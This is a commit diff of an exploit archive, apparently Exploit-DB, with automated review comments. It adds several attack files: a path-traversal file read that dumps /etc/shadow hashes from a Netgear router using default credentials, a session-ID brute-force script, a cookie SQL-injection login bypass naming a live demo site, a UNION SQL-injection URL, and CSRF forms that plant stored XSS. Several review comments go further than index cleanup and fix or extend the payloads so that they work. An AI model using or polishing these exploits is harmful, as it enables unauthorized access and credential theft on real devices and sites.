Updated 11_23_2014

Offensive Security 2014-11-23 04:46:32 +00:00
parent ba4b116f27
commit 4283820381
13 changed files with 885 additions and 1 deletions

@ -26857,7 +26857,7 @@ id,file,description,date,author,platform,type,port
29932,platforms/linux/remote/29932.txt,"Red Hat Directory Server 7.1 - Multiple Cross Site Scripting Vulnerabilities",2007-04-30,"Kaushal Desai",linux,remote,0
29933,platforms/asp/webapps/29933.txt,"Gazi Download Portal Down_Indir.ASP SQL Injection Vulnerability",2007-04-30,ertuqrul,asp,webapps,0
29934,platforms/windows/dos/29934.py,"ZIP Password Recovery Professional 5.1 (.zip) - Crash PoC",2013-11-30,KAI,windows,dos,0
29935,platforms/php/webapps/29935.php,"MyBB <= 1.6.11 - Remote Code Execution Using Admin Privileges",2013-11-30,BlackDream,php,webapps,0
29935,platforms/php/webapps/29935.php,"MyBB <= 1.6.11 - Remote Code Execution",2013-11-30,BlackDream,php,webapps,0
29937,platforms/windows/dos/29937.txt,"Aventail Connect 4.1.2.13 Hostname Remote Buffer Overflow Vulnerability",2007-04-30,"Thomas Pollet",windows,dos,0
29938,platforms/php/webapps/29938.txt,"E-Annu Home.PHP SQL Injection Vulnerability",2007-04-30,ilkerkandemir,php,webapps,0
29939,platforms/linux/dos/29939.txt,"X.Org X Window System Xserver 1.3 XRender Extension Divide by Zero Denial of Service Vulnerability",2007-05-01,"Derek Abdine",linux,dos,0
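Review bot: the rename of 29935 drops the only qualifier that marks it as a post-authentication bug. The hunk is a 7-line to 7-line change, so the two 29935 rows are the old and new description of one entry, not a duplicate id: `"MyBB <= 1.6.11 - Remote Code Execution Using Admin Privileges"` becomes `"MyBB <= 1.6.11 - Remote Code Execution"`. Keep the privilege requirement in the title (for example `Remote Code Execution (Admin Privileges)`), otherwise the index reads as an unauthenticated RCE.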
@ -31766,6 +31766,7 @@ id,file,description,date,author,platform,type,port
35264,platforms/php/webapps/35264.txt,"WordPress Featured Content Plugin 0.0.1 'listid' Parameter Cross Site Scripting Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0
35265,platforms/php/webapps/35265.php,"WordPress Recip.ly 1.1.7 'uploadImage.php' Arbitrary File Upload Vulnerability",2011-01-25,"AutoSec Tools",php,webapps,0
35266,platforms/php/webapps/35266.txt,"MyBB Forums 1.8.2 - Stored XSS Vulnerability",2014-11-17,"Avinash Thapa",php,webapps,0
35271,platforms/php/webapps/35271.txt,"Maarch LetterBox 2.8 - Insecure Cookies (Login Bypass)",2014-11-17,"ZoRLu Bugrahan",php,webapps,0
35272,platforms/hardware/webapps/35272.txt,"ZTE ZXHN H108L - Authentication Bypass",2014-11-17,"Project Zero Labs",hardware,webapps,0
35273,platforms/windows/remote/35273.html,"Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.1 Bypass (MS12-037)",2014-11-17,"ryujin & sickness",windows,remote,0
35274,platforms/php/webapps/35274.txt,"PHPFox - Stored XSS Vulnerability",2014-11-17,spyk2r,php,webapps,80
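Review bot: the port column of the new 35274 row is `80` while every other webapps row in this hunk, and the file's convention for the default port, is `0` (compare the 35266, 35271 and 35272 rows added here). Normalize it to 0 unless the entry genuinely depends on a non-default port, so consumers that treat a non-zero port as significant do not single this row out.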
@ -31805,3 +31806,14 @@ id,file,description,date,author,platform,type,port
35310,platforms/asp/webapps/35310.txt,"Web Wiz Forums <= 9.5 Multiple SQL Injection Vulnerabilities",2011-03-23,eXeSoul,asp,webapps,0
35311,platforms/php/webapps/35311.txt,"Octeth Oempro 3.6.4 SQL Injection and Information Disclosure Vulnerabilities",2011-02-03,"Ignacio Garrido",php,webapps,0
35312,platforms/php/webapps/35312.txt,"Firebook 'index.html' Cross Site Scripting Vulnerability",2011-02-03,MustLive,php,webapps,0
35314,platforms/linux/remote/35314.txt,"Wireshark <= 1.4.3 - '.pcap' File Memory Corruption Vulnerability",2011-02-03,"Huzaifa Sidhpurwala",linux,remote,0
35315,platforms/php/webapps/35315.txt,"Escortservice 1.0 'custid' Parameter SQL Injection Vulnerability",2011-02-07,NoNameMT,php,webapps,0
35316,platforms/multiple/remote/35316.sh,"SMC Networks SMCD3G Session Management Authentication Bypass Vulnerability",2011-02-04,"Zack Fasel and Matthew Jakubowski",multiple,remote,0
35317,platforms/hardware/remote/35317.txt,"Multiple Check Point Endpoint Security Products Information Disclosure Vulnerabilities",2011-02-07,Rapid7,hardware,remote,0
35318,platforms/windows/remote/35318.c,"Cain & Abel 2.7.3 'dagc.dll' DLL Loading Arbitrary Code Execution Vulnerability",2011-02-07,d3c0der,windows,remote,0
35319,platforms/php/webapps/35319.txt,"WebAsyst Shop-Script Cross Site Scripting and HTML Injection Vulnerabilities",2011-02-08,"High-Tech Bridge SA",php,webapps,0
35320,platforms/php/webapps/35320.txt,"ViArt Shop 4.0.5 Multiple Cross Site Scripting Vulnerabilities",2011-02-08,"High-Tech Bridge SA",php,webapps,0
35321,platforms/php/webapps/35321.txt,"Supr Shopsystem 5.1.0 - Persistent UI Vulnerability",2014-11-22,Vulnerability-Lab,php,webapps,0
35322,platforms/windows/local/35322.txt,"Privacyware Privatefirewall 7.0 - Unquoted Service Path Privilege Escalation",2014-11-22,LiquidWorm,windows,local,0
35323,platforms/php/webapps/35323.md,"MyBB <= 1.8.2 - unset_globals() Function Bypass and Remote Code Execution Vulnerability",2014-11-22,"Taoguang Chen",php,webapps,0
35325,platforms/hardware/webapps/35325.txt,"Netgear Wireless Router WNR500 - Parameter Traversal Arbitrary File Access Exploit",2014-11-22,LiquidWorm,hardware,webapps,0
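Review bot: two indexing inconsistencies in the new rows. 35323 is registered as `platforms/php/webapps/35323.md` while every other text advisory in the file is `.txt`; pick one extension convention so anything filtering by extension does not miss it. The 35321 description `"Supr Shopsystem 5.1.0 - Persistent UI Vulnerability"` does not name a bug class; the advisory body added in this same commit shows stored script injection into the shop name, slogan and tags fields, so describe it as persistent/stored XSS the way the 35266 row does for MyBB.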

@ -0,0 +1,18 @@
source: http://www.securityfocus.com/bid/46224/info
Multiple Check Point endpoint security products are prone to multiple information-disclosure vulnerabilities.
Attackers can exploit these issues to harvest sensitive information that may lead to further attacks.
http://www.example.com/conf/ssl/apache/integrity-smartcenter.cert
http://www.example.com/conf/ssl/apache/integrity-smartcenter.key
http://www.example.com/conf/ssl/apache/integrity.cert
http://www.example.com/conf/ssl/apache/integrity.key
http://www.example.com/conf/ssl/apache/smartcenter.cert
http://www.example.com/conf/ssl/integrity-keystore.jks
http://www.example.com/conf/ssl/isskeys.jks
http://www.example.com/conf/ssl/openssl.pem
http://www.example.com/conf/integrity.xml
http://www.example.com/conf/jaas/users.xml
http://www.example.com/bin/DBSeed.xml
http://www.example.com:8080/conf/ssl/apache/integrity-smartcenter.cert
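Review bot: the file gives no affected product names or versions, does not say which of the listed paths are retrievable without authentication, and does not describe the expected response, so the entry cannot be reproduced from the text alone; carry the product/version detail over from the BID. The impact line ("harvest sensitive information that may lead to further attacks") also undersells the list: `/conf/ssl/apache/integrity-smartcenter.key`, `/conf/ssl/apache/integrity.key`, `integrity-keystore.jks` and `isskeys.jks` are private-key material and `/conf/jaas/users.xml` is an account store, so a successful read hands over the server's TLS identity and user credentials. The last line repeats the first URL on port 8080 with no comment; if the point is that the files are exposed on both listeners, say so.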

@ -0,0 +1,86 @@
Netgear Wireless Router WNR500 Parameter Traversal Arbitrary File Access Exploit
Vendor: NETGEAR
Product web page: http://www.netgear.com
Affected version: WNR500 (firmware: 1.0.7.2)
Summary: The NETGEAR compact N150 classic wireless router (WNR500) improves
your legacy Wireless-G network. It is a simple, secure way to share your
Internet connection and allows you to easily surf the Internet, use email,
and have online chats. The quick, CD-less setup can be done through a web
browser. The small, efficient design fits perfectly into your home.
Desc: The router suffers from an authenticated file inclusion vulnerability
(LFI) when input passed thru the 'getpage' parameter to 'webproc' script is
not properly verified before being used to include files. This can be exploited
to include files from local resources with directory traversal attacks.
Tested on: mini_httpd/1.19 19dec2003
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2014-5208
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5208.php
16.11.2014
--
= 1 =============================================================
GET /cgi-bin/webproc?getpage=../../../etc/passwd&var:menu=advanced&var:page=null HTTP/1.1
Host: 192.168.1.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: sessionid=7dc3268b; auth=ok; expires=Sun, 15-May-2012 01:45:46 GMT; sessionid=7dc3268b; auth=ok; expires=Mon, 31-Jan-2050 16:00:00 GMT; language=en_us
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
Connection: keep-alive
---
HTTP/1.0 200 OK
Content-type: text/html
Cache-Control: no-cache
set-cookie: sessionid=7dc3268b;
set-cookie: auth=ok;
set-cookie: expires=Sun, 15-May-2012 01:45:46 GMT;
#root:x:0:0:root:/root:/bin/bash
root:x:0:0:root:/root:/bin/sh
#tw:x:504:504::/home/tw:/bin/bash
#tw:x:504:504::/home/tw:/bin/msh
= 2 =============================================================
GET /cgi-bin/webproc?getpage=../../../etc/shadow&var:menu=advanced&var:page=null HTTP/1.1
Host: 192.168.1.1:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: sessionid=7dc3268b; auth=ok; expires=Sun, 15-May-2012 01:45:46 GMT; sessionid=7dc3268b; auth=ok; expires=Mon, 31-Jan-2050 16:00:00 GMT; language=en_us
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
Connection: keep-alive
---
HTTP/1.0 200 OK
Content-type: text/html
Cache-Control: no-cache
set-cookie: sessionid=7dc3268b;
set-cookie: auth=ok;
set-cookie: expires=Sun, 15-May-2012 01:45:46 GMT;
#root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
#tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::
#tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::
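Review bot: the Desc paragraph mislabels the bug as "authenticated file inclusion (LFI)" while the title and the two PoCs show a path-traversal file read: both responses return `/etc/passwd` and `/etc/shadow` verbatim instead of interpreting them, so "authenticated directory traversal / arbitrary file read through the `getpage` parameter of `/cgi-bin/webproc`" is the accurate description, and it matches the index title. State the precondition up front as well: every request carries `Authorization: Basic YWRtaW46cGFzc3dvcmQ=` (admin:password), i.e. default credentials, and the Cookie header repeats `sessionid`, `auth` and `expires` twice, which looks like a copy-paste artifact rather than what the device actually sets. The `$1$` hashes in the second response should be redacted; the 200 response with the file body already proves the read.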

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/46167/info
Wireshark is prone to a memory-corruption vulnerability because it fails to properly handle certain files.
Successful exploits may allow attackers to execute arbitrary code within the context of the affected application. Failed exploit attempts will likely crash the application.
http://www.exploit-db.com/sploits/35314.pcap
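Review bot: the entry has no reproduction detail beyond an external link. It names no dissector or protocol, no affected build other than the `<= 1.4.3` in the index row, and the only artifact is `http://www.exploit-db.com/sploits/35314.pcap`. Add the triggering dissector from the BID and the one-line trigger (`wireshark -r 35314.pcap` or `tshark -r 35314.pcap`) so the crash can be reproduced if the link moves, and say whether the corruption is a read or a write, since the text asserts arbitrary code execution but the file shows nothing that supports more than a crash.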

@ -0,0 +1,18 @@
source: http://www.securityfocus.com/bid/46178/info
The SMC Networks SMCD3G gateway is prone to a remote authentication-bypass vulnerability.
An attacker can exploit this issue to gain unauthorized administrative access to the affected devices.
#!/bin/bash
start=1267604160
end=1267605960
for (( i=$start; i<=$end; i++)) do if [ `curl -sb userid=$i
http://10.1.10.1/admin/index.asp | grep -c login.asp` -lt
"1" ] then echo "Session ID Found: $i"
fi
if [ $(($i % 100)) -eq "0" ]
then echo "Currently at $i"
fi
done
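Review bot: the file will not run as a shell script as committed. The three description lines precede `#!/bin/bash` and are not commented, so bash would try to execute `source: http://www.securityfocus.com/bid/46178/info` as a command; the shebang must be line 1 and the prose prefixed with `#`. Inside the loop the `curl` invocation is wrapped onto separate lines (`curl -sb userid=$i` / `http://10.1.10.1/admin/index.asp | grep -c login.asp`), and the first `if [ ... ] then` has neither `;` nor a newline before `then`, so the loop is a syntax error even after the header is fixed. The guess window is also hard-coded: `start=1267604160` to `end=1267605960` is a 30-minute span of Unix timestamps from March 2010, so anyone running this against a live device has to edit the script; take the window and the target host from arguments.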

platforms/php/webapps/35271.txt Executable file
@ -0,0 +1,26 @@
# Title : Maarch LetterBox 2.8 Insecure Cookie Handling Vulnerability (Login Bypass)
# Author : ZoRLu / zorlu@milw00rm.com / submit@milw00rm.com
# Home : http://milw00rm.com / its online
# Date : 17.11.2014
# Demo : http://www.era.sn/courrier
# Download : http://downloads.sourceforge.net/project/maarchletterbox/MaarchLetterBox2.8.zip
# Thks : exploit-db.com, packetstormsecurity.com, securityfocus.com, sebug.net and others
you first go here:
http://www.target.com/path/index.php?page=welcome.php
you will go login.php, but if we change our cookie's with this exploit we will be login admin panel.
exploit:
javascript:document.cookie = "UserId=[username] ' or '; path=/";
or you edit your cookie's with "Cookies Manager"
name = maarch
contents = UserId=username ' or '
host = your target
path = /script_path/
and dont change other options its keep default.
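Review bot: the title calls this "Insecure Cookie Handling", but the payload `UserId=[username] ' or '` is a quote-breaking SQL injection delivered through the cookie value, so the bug class should be SQL injection in the cookie-based login check with login bypass as the impact; that also tells the vendor where the fix goes (parameterize the query that reads the cookie). The two methods disagree on the cookie name: the `javascript:document.cookie = "UserId=[username] ' or '; path=/"` line sets a cookie literally named `UserId`, while the manual steps say the cookie is `maarch` with contents `UserId=username ' or '`; only one of these can match what the application reads. `# Demo : http://www.era.sn/courrier` points at a live third-party installation and should be removed or replaced with a lab host.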

platforms/php/webapps/35315.txt Executable file
@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/46171/info
Escortservice is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Escortservice 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/show_profile.php?custid=1+and+1=0+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66--+
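Review bot: the PoC URL is wrapped across two lines between `,27` and `,28`, so copying it as committed yields a truncated query followed by a stray line beginning `,28,29,...`; keep it on one line. It would also help to say what the shape of the payload tells the reader: `custid=1 and 1=0 union select 1,version(),3,...,66--+` only works because the original query selects 66 columns, and `version()` lands in column 2, so that is the column to swap for `user()` or `database()` when extending the test.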

platforms/php/webapps/35319.txt Executable file
@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/46250/info
WebAsyst Shop-Script is prone to a cross-site-scripting vulnerability and an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
http://www.example.com/html/scripts/index.php?>[xss]
http://www.example.com/SC/html/scripts/index.php?did=22&login=1">[xss]&first_name=2"><script>alert(document.cookie)</script>&custgroupID=0&email=&last_name=&ActState=-1&search=%D0%9D%D0%B0%D0%B9%D1%82%D0%B8&charset=cp1251&count_to_export=
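Review bot: the first PoC `http://www.example.com/html/scripts/index.php?>[xss]` names no parameter and carries no value, so it is not reproducible as written; give the parameter or drop the line. The second PoC tests two parameters at once (`login=1">[xss]` and `first_name=2"><script>alert(document.cookie)</script>`), which makes it unclear which one reflects; split them. The surrounding fields (`did`, `custgroupID`, `ActState`, `count_to_export`, `charset=cp1251`) look like a back-office customer export form, so if this requires an authenticated admin session the text should say so.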

platforms/php/webapps/35320.txt Executable file
@ -0,0 +1,46 @@
source: http://www.securityfocus.com/bid/46256/info
ViArt Shop is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
ViArt Shop 4.0.5 is vulnerable; other versions may also be affected.
1. http://www.example.com/admin/admin_product.php?category_id=0&item_id=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
2. <form action="http://www.example.com/admin/admin_global_settings.php" method="post" name="main">
<input type="hidden" name="operation" value="save">
<input type="hidden" name="rp" value="admin.php">
<input type="hidden" name="tab" value="general">
<input type="hidden" name="site_name" value="Default Site">
<input type="hidden" name="site_url" value="http://host/">
<input type="hidden" name="admin_email" value="email@example.com">
<input type="hidden" name="layout_id" value="1">
<input type="hidden" name="password_encrypt" value="0">
<input type="hidden" name="admin_password_encrypt" value="0">
<input type="hidden" name="html_below_footer" value=&#039;12345"><script>alert(document.cookie)</script>&#039;>
<input type="hidden" name="operation" value="save">
</form>
<script>
document.main.submit();
</script>
3. <form action="http://www.example.com/admin/admin_manufacturer.php" method="post" name="main">
<input type="hidden" name="operation" value="save">
<input type="hidden" name="manufacturer_id" value="3">
<input type="hidden" name="manufacturer_name" value=&#039;Company"><script>alert(document.cookie)</script>&#039;>
<input type="hidden" name="manufacturer_order" value="1">
<input type="hidden" name="friendly_url" value="">
<input type="hidden" name="affiliate_code" value="">
<input type="hidden" name="short_description" value="">
<input type="hidden" name="full_description" value="">
<input type="hidden" name="image_small" value="images/manufacturers/small/company.gif">
<input type="hidden" name="image_small_alt" value="company">
<input type="hidden" name="image_large" value="images/manufacturers/large/company.gif">
<input type="hidden" name="image_large_alt" value="company">
</form>
<script>
document.main.submit();
</script>
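Review bot: PoCs 2 and 3 will not deliver their payload as written. `<input type="hidden" name="html_below_footer" value=&#039;12345"><script>alert(document.cookie)</script>&#039;>` (and the `manufacturer_name` input in PoC 3) uses the entity `&#039;` where a literal single quote is needed: the browser treats the value as unquoted, decodes `&#039;` to `'`, and ends the attribute at the first `>` after `12345"`, so the submitted value is `'12345"` and the `<script>` runs on the attacker's page instead of being stored. Write them as `value='12345"><script>alert(document.cookie)</script>'`. Form 2 also declares `name="operation"` twice (first and last hidden input); drop the duplicate. Since both forms auto-submit from a foreign origin, these are CSRF-delivered stored XSS into admin settings and the text should say so; only the first PoC is a plain reflected GET.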

platforms/php/webapps/35321.txt Executable file
@ -0,0 +1,260 @@
Document Title:
===============
Supr Shopsystem v5.1.0 - Persistent UI Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1353
Release Date:
=============
2014-11-07
Vulnerability Laboratory ID (VL-ID):
====================================
1353
Common Vulnerability Scoring System:
====================================
3.1
Product & Service Introduction:
===============================
SUPR is a modern and user-friendly system which allows each store very quickly and easily create their own online store.
Without installation and own webspace you can begin to create products and content right after the registration. With our
free designs and the great customization options you can customize and adapt to your ideas your shop. You have to be an
expert to work with the SUPR Shop.
( Copy of the Vendor Homepage: http://de.supr.com/tour )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent input validation vulnerability in the official Supr Shopsystem v5.1.0 web-application.
Vulnerability Disclosure Timeline:
==================================
2014-11-05: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Supreme NewMedia GmbH
Product: Supr - Shopsystem Web Application 5.1.0
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
An application-side input validation web vulnerability has been discovered in the official Supr Shopsystem v5.1.0 web-application.
The vulnerability can be exploited by remote attackers to execute persistent codes with forced client-side browser requests through a non
expired session or by local post inject.
The vulnerability is located in the blogname, shop slogan and tags input fields of the Dashboard > Settings > General > (setting_shopdetail) module.
Remote attackers are able to prepare client-side requests with malicious context to take over administrator accounts on interaction (click link).
Local attackers with privileged user accounts are also able to inject own script codes locally by manipulation of the vulnerable setting_shopdetail
POST method request. The execution of the code occurs above to the error exception-handling that should prevent but got evaded.
The error class with the exception will be evaded because of the request that went through and executes earlier then the exception prevents the execute.
Remote attackers are able to prepare a post request that allows to execute the code in one shot through the same origin policy. The request can be injected
locally to reproduce or as prepare POST request that manipulates the values when a non expired session clicks for example a manipulated link.
The security risk of the application-side web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.2.
Exploitation of the application-side web vulnerability requires a low privileged web-application user account and low user interaction.
Successful exploitation of the vulnerabilities result in persistent phishing mails, session hijacking, persistent external redirect to malicious
sources and application-side manipulation of affected or connected module context.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Dashboard > Settings > General > (setting_shopdetail)
Vulnerable Parameter(s):
[+] blogname
[+] blog/shop slogan
[+] tags
Affected Module(s):
[+] Dashboard (localhost:80/a/wp-admin/[x])
Proof of Concept (PoC):
=======================
The application-side vulnerability can be exploited by remote attackers with low privileged application user account and low user interaction click.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
PoC: Dashboard > Settings > General > (setting_shopdetail)
<form id="setting_shopdetail" name="setting_shopdetail" method="post" action="">
<div class="form-row field-error">
<div class="label">
<label for="setting_shopdata_blogname" class="mandatory">Shopname</label>
</div>
<div class="field">
<input id="setting_shopdata_blogname" name="setting_shopdata[blogname]" value="" type="text"><[PERSISTENT INJECTED SCRIPT CODE!];)" <"="">
<!-- <pre></pre> -->
<ul class="">
<li class="error">Das Feld <strong>Shopname</strong> enthält leider ungültige Zeichen!</li>
</ul></div>
Note: The error class with the exception will be evaded because of the request that went through and executes earlier then the exception prevents the execute.
Remote attackers are able to prepare a post request that allows to execute the code in one shot through the same origin policy. The request can be injected
locally to reproduce or as prepare POST request that manipulates the values when a non expired session clicks for example a manipulated link.
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/admin.php?route=/setting/shopdata
Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[text/html]
Request Header:
Host[localhost:80]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/admin.php?route=/setting/shopdata]
Cookie[PHPSESSID=ugqds8368sctjctkj1ldv34pu1; PHPSESSID=ugqds8368sctjctkj1ldv34pu1; __utma=182188197.576119580.1414780466.1414783994.1414786850.3;
__utmc=182188197; __utmz=182188197.1414780466.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=ugqds8368sctjctkj1ldv34pu1;
wordpress_sec_7bb63ff3c3ab7632bd8ee766293ae7eb=62ee207ef606cef58c93695d44c2f01e45ff19bd%7C1415993606%7C9555fc6c5a1ac4e4c05dacbb0d9dcd47;
wordpress_logged_in_7bb63ff3c3ab7632bd8ee766293ae7eb=62ee207ef606cef58c93695d44c2f01e45ff19bd%7C1415993606%7C9fc5b243fde7af93c9fce527e94da34f;
_ga=GA1.2.576119580.1414780466; _pk_id.9.44c1=298ac1e6c0a22deb.1414784009.1.1414784081.1414784009.; __utma=1.576119580.1414780466.1414786842.1414786842.1;
__utmb=1.4.10.1414786842; __utmc=1; __utmz=1.1414786842.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; wp-settings-time-29002=1414787115;
__utmb=182188197.24.10.1414786850]
Connection[keep-alive]
Cache-Control[max-age=0]
POST-Daten:
setting_shopdata%5Bblogname%5D[%22%3E%3C[PERSISTENT INJECTED SCRIPT CODE!]%28%22VL%22%29+%3C]
setting_shopdata%5Bblogdescription%5D[Shop+Slogan+%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C]
shopreg%5Bshoplang%5D[de_DE]
setting_shopdata%5Bshoplang%5D[de_DE]
setting_shopdata%5Bshopcategory%5D[]
setting_shopdata%5Bshopdesc%5D[%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C]
setting_shopdata%5Bshoptags%5D[%22%3E%3Ciframe+src%3Da+onload%3Dalert%28%22VL%22%29+%3C]
setting_shopdata%5Bemailfooter%5D[]
setting_shopdata%5Binvoicenote%5D[]
setting_shopdata%5Bshop_google_analytics_account%5D[]
setting_shopdata%5Bshop_google_webmastertools_verification_code%5D[]
setting_shopdata%5Bsubmit%5D[save]
Response Header:
Date[Fri, 31 Oct 2014 20:25:22 GMT]
Server[Apache/2.2.16 (Debian)]
X-Powered-By[PHP/5.3.3-7+squeeze22]
p3p[CP="CAO PSA OUR"]
Expires[Wed, 11 Jan 1984 05:00:00 GMT]
Cache-Control[no-cache, must-revalidate, max-age=0, no-cache]
Set-Cookie[PHPSESSID=ugqds8368sctjctkj1ldv34pu1
wp-settings-29002=deleted; expires=Thu, 31-Oct-2013 20:25:22 GMT; path=/
wp-settings-time-29002=1414787123; expires=Sat, 31-Oct-2015 20:25:23 GMT; path=/]
Pragma[no-cache]
X-Frame-Options[SAMEORIGIN]
Connection[close]
Content-Type[text/html; charset=UTF-8]
--
Status: 200[OK]
GET https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/[PERSISTENT INJECTED SCRIPT CODE!]
Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[283] Mime Type[text/html]
Request Header:
Host[localhost:80]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/admin.php?route=/setting/shopdata]
Cookie[PHPSESSID=ugqds8368sctjctkj1ldv34pu1; PHPSESSID=ugqds8368sctjctkj1ldv34pu1; __utma=182188197.576119580.1414780466.1414783994.1414786850.3;
__utmc=182188197; __utmz=182188197.1414780466.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=ugqds8368sctjctkj1ldv34pu1;
wordpress_sec_7bb63ff3c3ab7632bd8ee766293ae7eb=62ee207ef606cef58c93695d44c2f01e45ff19bd%7C1415993606%7C9555fc6c5a1ac4e4c05dacbb0d9dcd47;
wordpress_logged_in_7bb63ff3c3ab7632bd8ee766293ae7eb=62ee207ef606cef58c93695d44c2f01e45ff19bd%7C1415993606%7C9fc5b243fde7af93c9fce527e94da34f;
_ga=GA1.2.576119580.1414780466; _pk_id.9.44c1=298ac1e6c0a22deb.1414784009.1.1414784081.1414784009.; __utma=1.576119580.1414780466.1414786842.1414786842.1;
__utmb=1.4.10.1414786842; __utmc=1; __utmz=1.1414786842.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1; wp-settings-time-29002=1414787123; __utmb=182188197.24.10.1414786850]
Connection[keep-alive]
Cache-Control[max-age=0]
Response Header:
Date[Fri, 31 Oct 2014 20:25:24 GMT]
Server[Apache/2.2.16 (Debian)]
Content-Length[283]
Keep-Alive[timeout=5, max=8]
Connection[Keep-Alive]
Content-Type[text/html; charset=iso-8859-1]
Reference(s):
https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/admin.php?route=/setting/shopdata
https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/admin.php
https://localhost:80/iframe-src-a-onload-alert-vl/wp-admin/[x]
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable setting_shopdetail values in the input POST method request.
Restrict the input fields of the tags, blogname and blog slogan to prevent persistent script code injection attacks.
Setup the error exception above to the input mask and reconfigure it to capture the events correctly.
Security Risk:
==============
The security risk of the persistent input validation web vulnerability in the shopsystem is estimated as medium. (CVSS 3.1)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
